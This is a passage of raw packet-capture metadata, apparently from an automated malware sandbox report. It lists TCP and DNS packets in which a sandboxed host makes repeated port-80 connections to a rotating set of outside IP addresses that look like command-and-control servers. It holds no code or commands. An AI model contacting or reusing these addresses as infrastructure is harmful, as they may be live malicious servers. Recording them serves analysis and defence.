                                                        Nov 20, 2022 23:29:22.253247023 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.253267050 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.253406048 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.253480911 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.253501892 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.253633022 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.253705978 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.253726959 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.254012108 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.254156113 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.254175901 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.254268885 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.254343987 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.254364967 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.254482985 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.254558086 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.254585028 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.288114071 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.288237095 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.288280964 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.288311958 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.288386106 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.288408041 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.288518906 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.288589954 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.288609982 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.288738012 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.288810015 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.288832903 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.288949013 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.289022923 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.289043903 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.316447973 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.316689014 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.316739082 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.316771030 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.316905975 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.316930056 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.316992998 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.317086935 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.317116022 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.317151070 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.317245960 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.317265034 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.317315102 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.317406893 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.317435026 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.317517042 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.317615986 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.317650080 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.317751884 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.317837000 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.317859888 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.317967892 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.318057060 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.318078041 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.318162918 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.318243027 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.318267107 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.318378925 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.318474054 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.318494081 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.319036961 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.319178104 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.319192886 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.319226980 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.319310904 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.319402933 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.319509983 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.319547892 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.319880009 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.319991112 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.320017099 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320131063 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320221901 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.320247889 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320333958 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320422888 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.320450068 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320532084 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320614100 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.320636034 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320739985 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320828915 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.320852995 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320951939 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321048021 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.321077108 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321113110 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321212053 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.321240902 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321269035 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321352005 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.321372986 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321479082 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321566105 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.321588993 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321825027 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321954966 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.321979046 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.322211981 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.322334051 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.322365046 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.322407961 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.322501898 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.322525024 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323112965 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323215008 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.323246002 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323333025 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323436022 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.323466063 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323493958 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323589087 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.323617935 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323649883 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323736906 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.323757887 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323848009 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323935986 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.323957920 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.324121952 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.324223042 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.324246883 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.324459076 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.324512959 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.324542046 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.335315943 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.335359097 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.335383892 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.335403919 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:23.233603001 CET4971780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:23.322693110 CET804971741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:23.322808027 CET4971780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:23.322921991 CET4971780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:23.322964907 CET4971780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:23.411640882 CET804971741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:23.797904015 CET804971741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:23.798330069 CET4971780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:23.800646067 CET804971741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:23.800730944 CET4971780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:23.847181082 CET4971880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:23.885709047 CET804971741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:24.138269901 CET8049718222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:24.138458967 CET4971880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:24.144349098 CET4971880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:24.144644976 CET4971880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:24.435672045 CET8049718222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:25.349183083 CET8049718222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:25.349242926 CET8049718222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:25.349328041 CET4971880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:25.349395990 CET4971880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:25.381669044 CET4971980192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:25.590801001 CET8049719138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:25.591074944 CET4971980192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:25.591074944 CET4971980192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:25.591377974 CET4971980192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:25.640258074 CET8049718222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:25.801178932 CET8049719138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:26.479214907 CET8049719138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:26.479243040 CET8049719138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:26.479348898 CET4971980192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:26.479425907 CET4971980192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:26.504734039 CET4972080192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:26.583976984 CET804972041.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:26.584177017 CET4972080192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:26.584254980 CET4972080192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:26.584254980 CET4972080192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:26.662966013 CET804972041.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:26.686750889 CET8049719138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:27.059041023 CET804972041.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:27.059437990 CET4972080192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:27.061732054 CET804972041.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:27.061903000 CET4972080192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:27.089216948 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:27.137278080 CET804972041.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:27.376523972 CET8049721222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:27.376784086 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:27.376996040 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:27.377290010 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:27.664623022 CET8049721222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:28.573755026 CET8049721222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:28.573823929 CET8049721222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:28.573889971 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:28.573934078 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:28.600718021 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:28.677823067 CET804972241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:28.677927017 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:28.678064108 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:28.678082943 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:28.754218102 CET804972241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:29.086935043 CET804972241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:29.087414026 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:29.087665081 CET804972241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:29.087737083 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:29.126473904 CET4972380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:29.324719906 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:29.402053118 CET8049723175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:29.402373075 CET4972380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:29.402513027 CET4972380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:29.402838945 CET4972380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:29.402846098 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:29.478913069 CET804972241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:29.612423897 CET8049721222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:29.678147078 CET8049723175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:30.610542059 CET8049723175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:30.610598087 CET8049723175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:30.610690117 CET4972380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:30.618088961 CET4972380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:30.893506050 CET8049723175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:30.932749987 CET4972480192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:31.192688942 CET8049724210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:31.192852020 CET4972480192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:31.517656088 CET4972480192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:31.517844915 CET4972480192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:31.777708054 CET8049724210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:32.595757008 CET8049724210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:32.595835924 CET8049724210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:32.595905066 CET4972480192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:32.601103067 CET4972480192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:32.860780954 CET8049724210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:33.064251900 CET4972580192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:33.363080978 CET8049725222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:33.363246918 CET4972580192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:33.363390923 CET4972580192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:33.363420010 CET4972580192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:33.662056923 CET8049725222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:34.293982029 CET8049725222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:34.294049978 CET8049725222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:34.294183969 CET4972580192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:34.300976038 CET4972580192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:34.329443932 CET4972680192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:34.600096941 CET8049725222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:34.630419016 CET8049726175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:34.630572081 CET4972680192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:34.630713940 CET4972680192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:34.630990982 CET4972680192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:34.932027102 CET8049726175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:35.824575901 CET8049726175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:35.824639082 CET8049726175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:35.824888945 CET4972680192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:35.824888945 CET4972680192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:35.876899004 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:36.125711918 CET8049726175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:36.126600027 CET8049727210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:36.126765013 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:36.126864910 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:36.130844116 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:36.380748034 CET8049727210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:37.219599962 CET8049727210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:37.219758987 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:37.219851017 CET8049727210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:37.219913960 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:37.279455900 CET4972880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:37.555418968 CET8049728222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:37.555584908 CET4972880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:37.555684090 CET4972880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:37.555684090 CET4972880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:37.831864119 CET8049728222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:37.966115952 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:38.215517044 CET8049727210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:38.738382101 CET8049728222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:38.738410950 CET8049728222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:38.738579035 CET4972880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:38.738579035 CET4972880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:38.768434048 CET4972980192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:38.938813925 CET8049729190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:38.939096928 CET4972980192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:38.939202070 CET4972980192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:38.939950943 CET4972980192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:39.014533043 CET8049728222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:39.113909006 CET8049729190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:39.731589079 CET8049729190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:39.731615067 CET8049729190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:39.731750011 CET4972980192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:39.731797934 CET4972980192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:39.759722948 CET4973080192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:39.906188965 CET8049729190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:40.007188082 CET8049730210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:40.007893085 CET4973080192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:40.008032084 CET4973080192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:40.008094072 CET4973080192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:40.255486012 CET8049730210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:40.836579084 CET8049730210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:40.836635113 CET8049730210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:40.836711884 CET4973080192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:40.836857080 CET4973080192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:41.085927963 CET8049730210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:41.327713013 CET4973180192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:41.584096909 CET8049731210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:41.585067987 CET4973180192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:41.585199118 CET4973180192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:41.585227013 CET4973180192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:41.841474056 CET8049731210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:42.662532091 CET8049731210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:42.662710905 CET4973180192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:42.662743092 CET8049731210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:42.662833929 CET4973180192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:42.688241005 CET4973280192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:42.980325937 CET8049732222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:42.980477095 CET4973280192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:42.980601072 CET4973280192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:42.981434107 CET4973280192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:43.272686005 CET8049732222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:43.450988054 CET4973180192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:43.707019091 CET8049731210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:44.183577061 CET8049732222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:44.183617115 CET8049732222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:44.183697939 CET4973280192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:44.183746099 CET4973280192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:44.211855888 CET4973380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:44.475054979 CET8049732222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:44.502268076 CET8049733175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:44.502418995 CET4973380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:44.502536058 CET4973380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:44.502643108 CET4973380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:44.793267012 CET8049733175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:45.687060118 CET8049733175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:45.687124968 CET8049733175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:45.687280893 CET4973380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:45.687282085 CET4973380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:46.451160908 CET4973380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:46.741698980 CET8049733175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:30:11.202342987 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:30:11.202491045 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:30:11.202564955 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:30:11.477185011 CET8049703123.253.32.170192.168.2.4

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 20, 2022 23:28:58.315989017 CET5091153192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:28:58.335184097 CET53509118.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:28:58.910177946 CET5968353192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:28:59.136641026 CET53596838.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:00.610528946 CET6416753192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:00.628477097 CET53641678.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:02.125159025 CET5856553192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:02.142298937 CET53585658.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:03.178744078 CET5223953192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:03.197679043 CET53522398.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:08.133244038 CET5680753192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:08.150207996 CET53568078.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:09.308387041 CET6100753192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:09.759661913 CET53610078.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:11.139056921 CET6068653192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:11.402641058 CET53606868.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:12.490691900 CET6112453192.168.2.48.8.8.8
